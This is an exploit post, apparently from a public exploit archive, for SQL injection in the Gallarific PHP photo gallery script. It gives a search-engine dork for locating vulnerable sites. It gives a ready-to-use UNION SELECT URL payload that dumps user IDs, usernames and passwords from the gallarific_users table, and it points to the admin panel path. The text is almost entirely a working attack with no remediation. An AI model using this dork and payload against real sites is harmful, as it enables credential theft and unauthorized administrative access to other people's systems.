1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
GALLARIFIC PHP Photo Gallery Script (gallery.php) Sql Injection Vulnerability ================================================================================= #################################################################### .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn] .:. Script : http://www.gallarific.com/download.php .:. Dork : inurl:"/gadmin/index.php" #################################################################### ===[ Exploit ]=== www.site.com/gallery.php?id=null[Sql Injection] www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users-- ===[ Admin Panel ]=== www.site.com/gadmin/index.php #################################################################### |